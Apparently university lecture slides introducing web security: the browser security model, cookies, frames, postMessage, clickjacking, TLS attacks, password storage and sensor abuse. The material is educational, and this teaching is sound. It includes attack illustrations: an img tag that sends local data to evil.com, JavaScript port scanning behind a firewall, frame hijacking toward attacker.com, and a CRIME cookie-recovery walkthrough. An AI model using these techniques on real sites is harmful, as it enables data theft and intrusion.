John Mitchell
Dan Boneh
INTRODUCTION
TO WEB SECURITY
HTTP
Rendering the Content
Isolation
Navigation
Communication
Client State
Click-Jacking
Frame Busting
MODULE 2
Introduction
Module 2: Web Background
and the Browser Security Model
Reported Web Vulnerabilities "In the Wild"
Data from aggregator and validator of NVD-reported vulnerabilities
Web vs System vulnerabilities
Decline in % web vulnerabilities since 2009
§ 49% in 2010 -> 37% in 2011.
§ Big decline in SQL Injection vulnerabilities
XSS peak
Web application vulnerabilities
Pie chart: Web Application Vulnerabilities as a Percentage of All Disclosures in 2010: Web Applications 49%, Others 51%
Pie chart: Web Application Vulnerabilities as a Percentage of All Disclosures in 2011 H1: Web Applications 37%, Others 63%
Web Security Challenge
Diagram: a user's browser, on the network, talks to a good server and a bad server (the browser can also operate as a client to other servers); a prompt asks "Enter password?"
How can honest users safely interact with well-intentioned sites, while still freely browsing the web (search, shopping, etc.)?
Goals of web security
Safely browse the web
§ Users should be able to visit a variety of web sites, without incurring harm:
› No stolen information (without user’s permission)
› Site A cannot compromise session at Site B
Support secure web applications
§ Applications delivered over the web should have the same security properties we
require for stand-alone applications
And
§ Since many mobile apps are interfaces to web sites,
§ Support security for mobile apps.
Web Threat Models
Web attacker
§ Control attacker.com
§ Can obtain SSL/TLS certificate for attacker.com
§ User visits attacker.com
› Or: runs attacker’s Facebook app
Network attacker
§ Passive: Wireless eavesdropper
§ Active: Evil router, DNS poisoning
Malware attacker
§ Attacker escapes browser isolation mechanisms and runs separately under control of the OS
Outline
§ Web security goals and threat models
§ HTTP
§ Rendering: HTML, DOM, embedded content, JavaScript
§ Isolation: frames, same-origin policy, HTML5 sandboxing
§ Communication: fragment, post-message, cross-origin request
§ Frame navigation: Same-origin policy, descendant policy
§ Client storage: Cookies, Local storage, Native Client
§ Click-jacking, tap-jacking, frame busting
HTTP
Module 2: Web Background
and the Browser Security Model
Uniform Resource Locator (URL)
Global identifier of network-retrievable content
Example:
http://stanford.edu:81/class?name=cs155#homework
Parts of the example: protocol http, hostname stanford.edu, port 81, path /class, query name=cs155, fragment homework
Special characters are encoded as hex:
§ %0A = newline
§ %20 or + = space, %2B = + (special exception)
HTTP Request
GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Request line: method, file, HTTP version; then headers; then a blank line; then data (none for GET)
GET: no side effect; POST: possible side effect
HTTP Response
HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>
Status line: HTTP version, status code, reason phrase; then headers (Set-Cookie carries cookies); then data
Rendering Content
Module 2: Web Background
and the Browser Security Model
Rendering content
Browser execution model
Each browser window or frame
§ Loads content
§ Renders it
› Processes HTML and scripts to display page
› May involve images, subframes, etc.
§ Responds to events
Events can be
§ User actions: OnClick, OnMouseover
§ Rendering: OnLoad, OnBeforeUnload
§ Timing: setTimeout(), clearTimeout()
Example page source (washingtonpost.com, August 2013):
<head>
<title>Washington Post: Breaking News, World, US, DC News .. Analysis</title>
...
</head>
<body class="eidos homepage sectionfront">
<script type="text/javascript">
if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEditor')){top.location=self.location;}
</script>
...
<h2 class="headline"><a href="/world/national-security/nsa-gathered-thousands-of-americans-e-mails-before-court-struck-down-program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html">
Secret court: <br>NSA gathered thousands of domestic e-mails</a>
...
<p class="byline">Ellen Nakashima&#32…</p>
<p class="">
The program unlawfully gathered as many as tens of thousands of e-mails, according to a 2011 opinion.</p>
...
<div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline-block; "></div>
...
Share this video:
...
<a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on-the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941-6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')">
...
Document Object Model (DOM)
Object-oriented interface used to read and write docs
§ web page in HTML is structured data
§ DOM provides representation of this hierarchy
Examples
§ Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
§ Methods: document.write(document.referrer)
Includes Browser Object Model (BOM)
§ window, document, frames[], history, location, navigator (type
and version of browser)
Changing HTML using Script, DOM
Some possibilities
§ createElement(elementName)
§ createTextNode(text)
§ appendChild(newChild)
§ removeChild(node)
Example: Add a new list item to this HTML:
<ul id="t1">
<li> Item 1 </li>
</ul>
var text = 'Item 2';  // text for the new item
var list = document.getElementById('t1');
var newitem = document.createElement('li');
var newtext = document.createTextNode(text);
list.appendChild(newitem);
newitem.appendChild(newtext);
HTML Image Tags
Displays this nice picture →
Security issues?
<html>
…
<p> … </p>
…
<img src="http://example.com/sunset.gif" height="50" width="100">
…
</html>
Basic web functionality
Image tag security issues
Communicate with other sites
§ <img src="http://evil.com/pass-local-information.jpg?extra_information">
Hide resulting image
§ <img src=" … " height="1" width="1">
Spoof other sites
§ Add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
JavaScript onError
Basic function
§ Triggered when error occurs loading a document or an image
Example
§ Runs onError handler if image does not exist and cannot load
<img src="image.gif" onerror="alert('The image could not be loaded.')">
http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
JavaScript timing
Sample code
§ When response header indicates that page is not an image, the browser
stops and notifies JavaScript via the onerror handler.
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById('test');
var start = new Date();
test.onerror = function() {
  var end = new Date();
  alert("Total time: " + (end - start));   // elapsed ms until the load failed
};
test.src = "http://www.example.com/page.html";
</script>
</body></html>
Basic web functionality
Port scanning behind firewall
JavaScript can:
§ Request images from internal IP addresses
› Example: <img src="192.168.0.4:8080"/>
§ Use timeout/onError to determine success/failure
§ Fingerprint webapps using known image names
Diagram: 1) the browser asks the attacker's server for a page ("show me dancing pigs!"); 2) the malicious web page ("check this out") makes the browser scan servers behind the firewall; 3) the port scan results are reported back to the attacker's server
Basic web functionality
Remote scripting
Goal
§ Exchange data between a client-side app running in a browser and server-side app, without reloading page
Methods
§ Java Applet/ActiveX control/Flash
› Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
§ XML-RPC
› open, standards-based technology that requires XML-RPC libraries on server and in your client-side code.
§ Simple HTTP via a hidden IFRAME
› IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options
See: http://developer.apple.com/internet/webcontent/iframe.html
Important Point: A web site can maintain bi-directional communication with the browser (until the user closes/quits)
Simple remote scripting example
client.html (RPC by passing arguments to server.html in the query string):
<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
server.html (another page on the same server; could be server.php, etc.):
<script type="text/javascript">
window.parent.handleResponse()
</script>
RPC can be done silently in JavaScript, passing and receiving arguments
Isolation
Module 2: Web Background
and the Browser Security Model
Frame and iFrame
Window may contain frames from different sources
§ Frame: rigid division as part of frameset
§ iFrame: floating inline frame
iFrame example
Why use frames?
§ Delegate screen area to content from another source
§ Browser provides isolation based on frames
§ Parent may work even if frame is broken
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>
Windows Interact
Analogy
Operating system
Primitives
§ System calls
§ Processes
§ Disk
Principals: Users
§ Discretionary access control
Vulnerabilities
§ Buffer overflow
§ Root exploit
Web browser
Primitives
§ Document object model
§ Frames
§ Cookies / localStorage
Principals: “Origins”
§ Mandatory access control
Vulnerabilities
§ Cross-site scripting
§ Cross-site request forgery
§ Cache history attacks
§ …
Browser security mechanism
Each frame of a page has an origin
§ Origin = protocol://host:port
Frame can access its own origin
§ Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
Components of browser security policy
Frame-Frame relationships
§ canScript(A,B)
› Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
§ canNavigate(A,B)
› Can Frame A change the origin of content for Frame B?
Frame-principal relationships
§ readCookie(A,S), writeCookie(A,S)
› Can Frame A read/write cookies from site S?
Library import excluded from SOP
<script src="https://seal.verisign.com/getseal?host_name=a.com"></script>
• Script has the privileges of the page that imports it, NOT of the source server (here VeriSign).
• Can script other pages in this origin, load more scripts
• Same issues with other forms of importing
Domain Relaxation
Origin: scheme, host, (port), hasSetDomain
Try document.domain = document.domain
Before relaxation: www.facebook.com and chat.facebook.com are different origins and cannot script each other
After both set document.domain = "facebook.com": both have origin facebook.com (with hasSetDomain) and can script each other
HTML5 Frame sandbox
Specify sandbox attribute of iframe
<iframe sandbox src="http://untrusted.site.net/content"></iframe>
Creates restricted frame
§ Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be
executed.
§ Forms are disabled. The hosted content is not allowed to post forms back to any target.
§ Scripts are disabled. JavaScript is disabled and will not execute.
§ Links to other browsing contexts are disabled. An anchor tag targeting different browser
levels will not execute.
§ Unique origin treatment. All content is treated under a unique origin. The content is not
able to traverse the DOM or read cookie information.
Optional attributes relax sandbox
allow-forms
§ Allows embedded page to post back using a form submit within the frame.
allow-scripts
§ Enables JavaScript
allow-same-origin
§ Can access DOM of another frame, subject to same-origin policy
§ Only useful with allow-scripts
§ But be careful: parent frame can manipulate sandbox attributes and remove further
restrictions.
allow-top-navigation
§ Allow content to navigate entire tab/window
allow-popups
§ Allow embedded content to open new popup windows
Navigation
Module 2: Web Background
and the Browser Security Model
Guninski Attack
A frame is named awglogin; the attacker's page runs:
window.open("https://attacker.com/", "awglogin");
What should the policy be?
Candidate policies: Child, Sibling, Descendant, Frame Bust
Legacy Browser Behavior (Browser: Policy)
IE 6 (default): Permissive
IE 6 (option): Child
IE7 (no Flash): Descendant
IE7 (with Flash): Permissive
Firefox 2: Window
Safari 3: Permissive
Opera 9: Window
HTML 5: Child
Window Policy Anomaly
top.frames[1].location = "http://www.attacker.com/...";
top.frames[2].location = "http://www.attacker.com/...";
...
Adoption of Descendant Policy (Browser: Policy)
IE7 (no Flash): Descendant
IE7 (with Flash): Descendant
Firefox 3: Descendant
Safari 3: Descendant
Opera 9: (many policies)
HTML 5: Descendant
Communication
Module 2: Web Background
and the Browser Security Model
Fragment Identifier Messaging
Send information by navigating a frame
§ http://gadget.com/#hello
Navigating to fragment doesn’t reload frame
§ No network traffic, but frame can read its fragment
Not a secure channel
§ Confidentiality
§ Integrity
§ Authentication
✓
✗
✓
window.postMessage
API for inter-frame communication
§ Supported in current browsers
§ A network-like channel between frames
(Diagram: gadgets "Add a contact" and "Share contacts" in separate frames exchanging messages)
postMessage syntax:
window.addEventListener("message", function (e) {
  if (e.origin == "http://a.com") {
    ... e.data ... }
}, false);
frames[0].postMessage("Attack at dawn!", "http://b.com/");
Facebook Anecdote
frames[0].postMessage("Attack at dawn!");
Why include "targetOrigin"?
What goes wrong?
Messages sent to frames, not principals
§ When would this happen?
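An added example (not the slides' code): a small model of frames and postMessage delivery showing why the sender's targetOrigin and the receiver's e.origin check both matter; the Frame class, the scenario and the origins are constructed.

```javascript
// Added example (not from the slides): a model of browser frames and
// window.postMessage delivery. Frame and the origins are constructed; the
// delivery rule (compare targetOrigin with the origin of the document that is
// currently in the frame) is the one browsers apply.
class Frame {
  constructor(origin) { this.origin = origin; this.listeners = []; this.inbox = []; }

  // Navigation loads a new document into the same frame object: the old
  // document's listeners and state are gone, but a reference held by the
  // parent (frames[0]) still points at this frame.
  navigate(newOrigin) { this.origin = newOrigin; this.listeners = []; this.inbox = []; }

  addEventListener(type, fn) { if (type === 'message') this.listeners.push(fn); }

  // Messages are addressed to frames, not principals: the browser delivers to
  // whichever document is in the frame now, unless targetOrigin rules it out.
  postMessage(data, targetOrigin, sender) {
    if (targetOrigin !== '*' && new URL(targetOrigin).origin !== this.origin) {
      return false;   // dropped before delivery: not the principal the sender named
    }
    const e = { data, origin: sender.origin, source: sender };
    for (const fn of this.listeners) fn(e);
    return true;
  }
}

// Receiver side: accept only messages whose origin is the one we expect.
function installTrustedListener(frame, trustedOrigin) {
  frame.addEventListener('message', (e) => {
    if (e.origin !== trustedOrigin) return;   // anyone else is ignored
    frame.inbox.push(e.data);
  });
}

// Scenario from the slides: a.com embeds a gadget from b.com and sends it a
// message. Optionally the gadget frame has been navigated elsewhere first.
function scenario(targetOrigin, navigatedTo) {
  const parent = new Frame('http://a.com');
  const gadget = new Frame('http://b.com');
  installTrustedListener(gadget, 'http://a.com');
  if (navigatedTo) {
    gadget.navigate(navigatedTo);
    gadget.addEventListener('message', (e) => {
      gadget.inbox.push('seen by ' + gadget.origin + ': ' + e.data);
    });
  }
  const delivered = gadget.postMessage('Attack at dawn!', targetOrigin, parent);
  return { delivered, inbox: gadget.inbox.slice() };
}
```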
Two-way communication
A method call is associated with a response
Can build this on top of postMessage
§ Messenger: Each time you call a method in the iframe, you pass a reply function that is
called with the results of that method call.
jQuery postMessage plugin
Wraps the postMessage API and simplifies its usage.
Works in browsers that do not support postMessage method by using fragment
navigation (hash portion of the url)
Network communication
Cross-origin network requests: a page in the Site A context requests a resource from Site B; Site B's response header controls access:
Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Client State
Module 2: Web Background
and the Browser Security Model
Cookies
Used to store state on user's machine
HTTP is a stateless protocol; cookies add state
Server -> Browser (response to POST …), HTTP header:
Set-cookie: NAME=VALUE ;
domain = (who can read) ;
expires = (when expires) ;
secure = (only over SSL)
If expires=NULL: this session only
Browser -> Server on later requests (GET …):
Cookie: NAME = VALUE
Cookie authentication
Browser -> Web Server: POST login.cgi with username & pwd
Web Server -> Auth server: validate user; Auth server returns auth=val; Web Server stores val
Web Server -> Browser: Set-cookie: auth=val
Browser -> Web Server: GET restricted.html with Cookie: auth=val
Web Server -> Auth server: check val; Auth server answers YES/NO
If YES, Web Server -> Browser: restricted.html
Cookie Security Policy
Uses:
§ User authentication
§ Personalization
§ User tracking: e.g. Doubleclick (3rd party cookies)
Origin is the tuple <domain, path>
§ Can set cookies valid across a domain suffix
§ Complicated and implementation-specific rules for selecting
cookie values, when many cookies apply
Secure Cookies
Server -> Browser (response to GET …), HTTP header:
Set-cookie: NAME=VALUE ;
Secure=true
• Provides confidentiality against network attacker
• Browser will only send cookie back over HTTPS
• … but no integrity
• Can rewrite secure cookies over HTTP
⇒ network attacker can rewrite secure cookies
⇒ can log user into attacker's account
httpOnly Cookies
Server -> Browser (response to GET …), HTTP header:
Set-cookie: NAME=VALUE ;
httpOnly
• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs
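An added example (not from the slides): a Set-Cookie parser with the Secure, HttpOnly, Domain, Path and Expires rules above, used to check what a browser would send on a given request and what page script can read; sample headers and hosts are constructed.

```javascript
// Added example (not from the slides): parse a Set-Cookie header into the
// attributes the slides discuss and decide (a) whether the browser would send
// the cookie on a given request URL and (b) whether page script can read it.
// Sample headers are constructed; the matching rules follow RFC 6265.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                   domain: null, path: '/', secure: false, httpOnly: false, expires: null };
  for (const a of attrs) {
    const [k, v = ''] = a.split('=');
    switch (k.toLowerCase()) {
      case 'domain':   cookie.domain = v.replace(/^\./, '').toLowerCase(); break;
      case 'path':     cookie.path = v || '/'; break;
      case 'secure':   cookie.secure = true; break;
      case 'httponly': cookie.httpOnly = true; break;
      case 'expires':  cookie.expires = new Date(v); break;   // absent => session cookie
    }
  }
  return cookie;
}

// Domain attribute matches the host itself or any subdomain of it.
function domainMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Path attribute matches the request path by prefix at a "/" boundary.
function pathMatches(reqPath, cookiePath) {
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || reqPath.length === cookiePath.length ||
         reqPath[cookiePath.length] === '/';
}

// Would the browser attach this cookie (set by setHost) to a request for url?
function wouldSend(cookie, setHost, url, now = new Date()) {
  const u = new URL(url);
  if (cookie.secure && u.protocol !== 'https:') return false;   // Secure: HTTPS only
  if (cookie.expires && cookie.expires <= now) return false;     // expired
  if (cookie.domain) {
    if (!domainMatches(u.hostname, cookie.domain)) return false;
  } else if (u.hostname !== setHost) {
    return false;                                                 // host-only cookie
  }
  return pathMatches(u.pathname, cookie.path);
}

// document.cookie never exposes HttpOnly cookies; that is what limits XSS theft.
function visibleToScript(cookie) { return !cookie.httpOnly; }

// The Cookie: header line the browser would build for url from a cookie jar.
function cookieHeader(cookies, setHost, url) {
  return cookies.filter((c) => wouldSend(c, setHost, url))
                .map((c) => `${c.name}=${c.value}`).join('; ');
}
```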
HTML5 Local Storage
Based on named key/value pairs
§ Store data based on a named key (a string)
§ Retrieve that data with the same key
§ Data can be any type supported by JavaScript
› Including strings, Booleans, integers, floats
› But data is actually stored as a string
Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the
expected JavaScript datatype
Some browsers also implement Web SQL Database
§ Other forms of local storage would also be useful
Example
Save a sentence in Local Storage:
localStorage.setItem('1', 'This is a sample sentence');
Retrieve it:
var data = localStorage.getItem('1');
Local Storage supports length, removeItem() and clear().
Security issues
Storage per origin
§ Origin is: scheme, host, port
Could be accessed by user with local access (varies by browser)
Can be accessed by JavaScript in page
§ no httpOnly so vulnerable to XSS attacks
XSS attacks can read local storage
§ Do not store sensitive information
XSS attacks can write local storage
§ Do not trust data read from local storage
Native Client
Sandboxed native code
Sandbox techniques
Static analysis
§ No loads or stores permitted outside the data sandbox
› Enforced by operating system protection mechanisms
§ No unsafe instructions
› Examples: syscall, int, and lds.
§ Control flow integrity
› All direct, indirect branches target a safe instruction
Dynamic monitoring
§ Native Client runtime mediates system calls
Click-Jacking
Module 2: Web Background
and the Browser Security Model
Clickjacking
Attacker overlays multiple transparent or opaque frames to trick a user into clicking on a button or link on another page
Clicks meant for the visible page are hijacked and routed to another, invisible page
Clickjacking in the Wild
Google search for “clickjacking” returns 342,000 results… this is not a hypothetical
threat!
Summer 2010: Facebook worm superimposes an invisible iframe over the entire page
that links back to the victim's Facebook page
§ If victim is logged in, automatically recommends link to new friends as soon as the
page is clicked on
Many clickjacking attacks against Twitter
§ Users send out tweets against their will
Tap-jacking
Frame Busting
Module 2: Web Background
and the Browser Security Model
Frames
Embed HTML documents in other documents
<iframe name="myframe" src="http://www.google.com/">
This text is ignored by most browsers.
</iframe>
Frame Busting
Goal: prevent web page from loading in a frame
§ example: opening login page in a frame will display correct passmark image
Frame busting:
if (top != self)
  top.location.href = location.href
Better Frame Busting
Problem: JavaScript OnUnload event; the framing page can cancel the navigation away from it with
<body onUnload="javascript: cause_an_abort;">
Try this instead:
if (top != self)
  top.location.href = location.href
else { … code of page here … }
Summary
• Web security goals and threat models
• HTTP
• Rendering: HTML, DOM, embedded content, JavaScript
• Isolation: frames, same-origin policy, HTML5
sandboxing
• Communication: fragment, post-message, cross-
origin request
• Frame navigation: Same-origin policy, descendant
policy
• Client storage: Cookies, Local storage, Native Client
• Click-jacking, tap-jacking, frame busting
TLS 1.3
Compression attacks
Password Breaches
Certificates on the Web
Abusing Mobile Sensors
MODULE 3
Topics for this section
TLS attacks and defenses:
Compression attacks: CRIME and BREACH, TLS 1.3
Password breaches and 2nd factor authentication
Certificate Authorities: compromises, Let's Encrypt, universal TLS
New hardware security support: Intel SGX
Sensor abuse on mobile phones
TLS 1.3
Module 3: Attacks and Defenses
Review: TLS 1.2 (most common: server authentication only)
browser -> server: client-hello
server -> browser: server-hello + server-cert (PK); the cert comes from a CA and the server holds SK
key exchange (several options); e.g. browser picks random k and sends client-key-exchange: E(PK, k), so both sides hold k
Finished
HTTP data encrypted with KDF(k)
Review: TLS record encryption (original design)
browser and server share k
plaintext HTTP data is split into 16KB records
per record: compute an integrity tag (MAC) over the plaintext, then encrypt plaintext and tag under k; send hdr || ciphertext
encryption method is called MAC-then-encrypt:
the reason for many attacks on TLS (BEAST, Lucky13, POODLE, … )
why?
TLS 1.3: a new version of TLS (2017)
Record encryption:
• mandatory method: AES128-GCM
fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte
• On weaker processors: CHACHA20_POLY1305
fast in software
Both methods provide authenticated encryption
TLS 1.3: a new version of TLS (2017)
Session setup:
• Forward secrecy required (non-forward secure method is deprecated)
• Zero round-trip setup option:
client can send encrypted data on first flow (after client-hello)
• Server certificate is encrypted (previously, sent in the clear)
stronger privacy when server has multiple certificates
• Initiate TLS session from a pre-shared secret, if one exists
more general than session-resume in TLS 1.2
Compression Attacks
Module 3: Attacks and Defenses
Compression and Encryption
Strong desire to combine compression and encryption
How?
Option 1: first encrypt and then compress
Does not work … ciphertext looks like a random string
Compression and Encryption
Option 2: first compress and then encrypt
Used in many Internet protocols (TLS, HTTPS, QUIC, …)
Recall in TLS: 16KB records, with support for compression before encryption, e.g. of this request:
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Trouble … [Kelsey’02]
Compress-then-encrypt reveals information:
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
POST /bank.com/buy?id=goog
Cookie: uid=JhPL8g69684rksfsdg
Second message compresses better than first:
network observer can distinguish the two messages!
Even worse: the CRIME attack [RD'2012] (simplified)
Goal: steal user's bank cookie
JavaScript can issue requests to Bank, but cannot read the Cookie value:
POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
The JavaScript chooses the request path and observes the ciphertext size (16KB records) for each guess:
POST /bank.com/buy?uid=A11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
POST /bank.com/buy?uid=B11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
…
POST /bank.com/buy?uid=J11111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Ciphertext size is slightly shorter ⇒ first character of Cookie is "J"
POST /bank.com/buy?uid=Ja1111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
…
POST /bank.com/buy?uid=Jh1111…
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com
Ciphertext size is slightly shorter ⇒ 2nd character of Cookie is "h"
Recover entire cookie after 256 × (len of Cookie) attempts
Takes several seconds
What to do?
The problem:
Observed ciphertext length reveals compression amount ⇒
reveals plaintext info … no good solution
Non-defense: add a random length pad to ciphertext
First defense: compression disabled in TLS (and others, e.g., SPDY)
Problem: compression also done in HTTP layer
⇒ BREACH attack [PHG’13]
… much harder to disable HTTP compression in practice
What to do? [PHG’13]
Many web sites are impacted …
A proposed defense:
› Application layer “tags” sensitive data fields in
HTTP requests and responses (cookies, PII, etc.)
› HTTP-level compression only applied to non-sensitive fields
… but not easy to implement
Password Breaches
Module 3: Attacks and Defenses
A (small) sample of password breaches
2012: LinkedIn: 6 million passwords (hashed, unsalted)
2013:
Twitter: 250,000 passwords (hashed, salted)
Evernote: 50 million records: usernames, emails, hashed passwords
Adobe: 38 million records
email addrs., password hints, and encrypted passwords
2015:
LastPass: stolen email addr., hashed master passwords (and salts)
(server-side compromise)
Weak password choice
A common occurrence
Example: the Rockyou password list,  2009 (6 most common pwds): 123456, 12345, Password, iloveyou, princess, abc123
List of 360,000,000 words covers about 25% of user passwords
Users frequently choose weak passwords (Adobe list, 2013), fraction of users per password:
123456 (5%), 123456789 (1.1%), password (0.9%), adobe123 (0.5%), 12345678 (0.5%), qwerty (0.5%), 1234567 (0.3%); total: 8.8%
How to store passwords
First rule of password storage: never store passwords in the clear!
password database (id, salt, hash):
Alice, SA, H(pwA, SA)
Bob, SB, H(pwB, SB)
…, …, …
To validate a password pwA presented for Alice, the server checks:
H(pwA, SA) ≟ StoredHash(Alice)
How to hash?
LinkedIn: SHA-1 hashed (unsalted) passwords
⇒ 6 days, 90% of pwds. recovered by exhaustive search
The problem: SHA-1 is too fast …
attacker can try all words in dictionary
To hash passwords:
• Use a keyed hash function (e.g., HMAC) where key stored in HSM
• In addition: use a slow, space-hard function
How to hash?
PBKDF2, bcrypt: slow hash functions
• Slowness by “iterating” a crypto hash function like SHA256
• Parameterized number of iterations (e.g., set for 1000 evals/sec)
Problem: custom hardware (e.g., GPU) can evaluate
hash function much faster than a commodity CPU
⇒ attacker can do dictionary attack much faster
than 1000 evals/sec.
Why is custom hardware faster?
Only a small part of a CPU (Intel Skylake) is used to hash; custom hardware for Bitcoin mining (Antminer S7, 5.06TH/s, $1,695) does nothing else
Chart: hash rate, Intel x86 vs Antminer: 93 vs 5060, about 50x
How to hash?
Scrypt: a slow hash function AND need lots of memory to evaluate
⇒ custom hardware not much faster than commodity CPU
Problem: memory access pattern depends on input password
⇒ local attacker can learn memory access pattern for user’s pwd
⇒ eliminates need for memory in an offline dictionary attack
Is there a space-hard function where time is independent of pwd?
• Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
Strengthening User Authentication
One option: biometrics:
Fingerprints, retina, facial recognition, …
Benefit: hard to forget
Problems:
Biometrics are not generally secret
Cannot be changed, unlike passwords
⇒ Should primarily be used as second-factor authentication (note: CCC'13)
2nd factor OTP authentication
Setup:
Choose random key k
On device and server: sk = (k, 0)
Identification (user and server both hold (k, 0)):
user sends r0 ← HMAC(k, 0); server answers yes iff r0 = HMAC(k, 0)
both sides then advance to (k, 1); next login: user sends r1 ← HMAC(k, 1), and so on
often, time-based updates
Google authenticator
6-digit timed one-time passwords (TOTP) [RFC 6238]
Wide web-site adoption: Gmail, Dropbox, WordPress, …
› Open study: 6.4% Gmail user adoption [EuroSec 2015]
To enable TOTP for a user: web site presents QR code with embedded data:
otpauth://totp/Example:alice@dropbox.com?secret=JBSWY3DPEHPK3PXP&issuer=Example
(Subsequent user logins require user to present TOTP)
Danger: password reset upon user lockout
Server compromise exposes secrets
March 2011:
RSA announced servers attacked, secret keys stolen
⇒ enabled SecurID user impersonation
Can we do better? Answer: Yes!
Duo (also FIDO U2F)
Signature-based challenge response:
user database (id, pub-key): Alice: pkA; Bob: pkB; …
user's device holds the secret key sk
login page: user enters pwd; server sends 2FA challenge m; device responds with sign(sk, m); server verifies the signature against the stored pub-key and confirms the login
No secrets on server, simple user experience
Certificates
on the Web
Module 3: Attacks and Defenses
Certificate Issuance Woes
Wrong issuance:
2011: Comodo and DigiNotar RAs hacked, issue certs for Gmail, Yahoo! Mail
2013: TurkTrust issued cert. for gmail.com (discovered by pinning)
2014: Indian NIC (intermediate CA trusted by the root CA IndiaCCA) issue certs
for Google and Yahoo! domains
Result: (1) India CCA revoked NIC’s intermediate certificate
(2) Chrome restricts India CCA root to only seven Indian domains
2015: MCS (intermediate CA cert issued by CNNIC) issues certs for Google
domains
Result: current CNNIC root no longer recognized by Chrome
⇒ enables eavesdropping w/o a warning on user’s session
Man in the middle attack using rogue cert
Attacker proxies data between user and bank.
Sees all traffic and can modify data at will.
bank
attacker
ClientHello ClientHello
BankCert
BadguyCert
ServerCert (Bank)
ServerCert (rogue)
GET https://bank.com
SSL key exchange SSL key exchange
k1 k1 k2 k2
HTTP data enc with k1 HTTP data enc with k2
(cert for Bank by a valid CA)
What to do? (many good ideas)
HPKP: HTTP public-key pinning
§ HTTP header that lets a site declare CAs that can sign its cert
Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs=";
§ on subsequent HTTPS, browser rejects certs issued by other CAs
§ TOFU: Trust on First Use
Certificate Transparency (CT): [LL’12]
§ idea: CA’s must advertise a log of all certs. they issued
§ Browser will only use a cert if it is on the CT log
• Efficient implementation using Merkle hash trees
• Companies can scan logs to look for invalid issuance
A new CA: Let’s encrypt (letsencrypt.org)
A new open Certificate Authority: free certs
• Provisioning via an automated agent running on web server
Step 1: install agent on web server
Step 2: agent proves domain ownership (e.g. bank.com) by a DNS record under bank.com or a page at a fixed URI at bank.com, and sends a Certificate Signing Request (CSR) to the CA
Step 3: Let's Encrypt CA checks domain ownership; if valid, issues cert and sends cert to agent
Step 4: agent installs cert on web server … done
2016: 800K certs issued
Abusing Mobile Sensors
Module 3: Attacks and Defenses
Sensors on smart phones (no user permission required):
Microphone
Camera
GPS
Light sensor
Compass
MEMS Gyroscope / accelerometer
Power meter
Barometer
Heart rate / oximeter (on smart watches)
All have a specific function
Can they be abused ??
Example 1: fingerprinting
Imperfections in camera sensor can be used to link pictures taken by same phone [LG'06]
Accelerometer gives a stable device fingerprint [BBMN'14, DRXCN'14]
§ App can tell if it has been previously installed on device (diagram: app derives a device-id from the sensor)
Example 2: Gyrophone [MBN’14]
Phone gyroscope: measures vibrations (used for games)
Trouble:
› Gyroscope picks up air vibrations (a.k.a. speech)
› Sample rate (apps): 200 Hz
› Machine learning ⇒ can recognize some speech
Example 3: Power usage sensor
Modern phones measure power drained from battery
Enables apps to optimize power use
Repeatedly read:
/sys/class/power_supply/battery/voltage_now
/sys/class/power_supply/battery/current_now
Unrestricted access.
Can this be abused?
Example 3: Power usage sensor
Can this be abused? [MBSN’15]
Observation: power used by radio depends on
distance and obstacles to cell tower
So what?
Our work: [MBSN’15]
power readings + machine learning ⇒ GPS
